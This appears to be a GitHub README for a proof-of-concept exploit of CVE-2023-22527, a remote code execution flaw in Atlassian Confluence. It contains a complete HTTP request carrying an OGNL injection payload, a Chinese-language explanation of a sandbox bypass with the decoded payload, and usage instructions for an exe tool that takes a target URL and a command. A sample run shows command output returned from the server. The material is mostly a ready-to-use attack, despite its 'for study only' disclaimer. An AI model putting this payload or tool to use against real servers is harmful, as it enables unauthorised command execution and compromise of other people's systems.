C1ph3rX13/CVE-2023-22527

Atlassian Confluence - Remote Code Execution (CVE-2023-22527)

CVE-2023-22527

Atlassian Confluence - Remote Code Execution (CVE-2023-22527)

Poc

POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

vulhub 提及的绕过方式

在Confluence 7.18.0版本后，官方开发者为其引入了isSafeExpression函数来限制执行恶意OGNL表达式。安全研究者Alvaro Muñoz分享了一种利用velocity模板中的#request['.KEY_velocity.struts2.context'].internalGet('ognl').findValue(String, Object)来获取无沙箱的OGNL对象并执行任意语句的绕过方法，完整并解码后的Payload如下：

'+(#request['.KEY_velocity.struts2.context'].internalGet('ognl').findValue(@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"})),{}))+'

Usage

         ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██████╗ ██████╗ ███████╗██████╗ ███████╗
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ╚════██╗╚════██╗██╔════╝╚════██╗╚════██║
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗ █████╔╝ █████╔╝███████╗ █████╔╝    ██╔╝
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝██╔═══╝ ██╔═══╝ ╚════██║██╔═══╝    ██╔╝
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝      ███████╗███████╗███████║███████╗   ██║
         ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝       ╚══════╝╚══════╝╚══════╝╚══════╝   ╚═╝

        @Auth: C1ph3rX13
        @Blog: https://c1ph3rx13.github.io
        @Note: Atlassian Confluence - Remote Code Execution (CVE-2023-22527)
        @Warn: 代码仅供学习使用，请勿用于其他用途

Usage of CVE-2023-22527.exe:
  -c string
        Command
  -p string
        Proxy Url
  -t string
        Target Url

Run

CVE-2023-22527.exe -t http://127.0.0.1:8090 -c "id"


         ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██████╗ ██████╗ ███████╗██████╗ ███████╗
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ╚════██╗╚════██╗██╔════╝╚════██╗╚════██║
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗ █████╔╝ █████╔╝███████╗ █████╔╝    ██╔╝
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝██╔═══╝ ██╔═══╝ ╚════██║██╔═══╝    ██╔╝
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝      ███████╗███████╗███████║███████╗   ██║
         ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝       ╚══════╝╚══════╝╚══════╝╚══════╝   ╚═╝

        @Auth: C1ph3rX13
        @Blog: https://c1ph3rx13.github.io
        @Note: Atlassian Confluence - Remote Code Execution (CVE-2023-22527)
        @Warn: 代码仅供学习使用，请勿用于其他用途

2024-01-23 16:53:16 INFO [+] RCE Result: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence),0(root)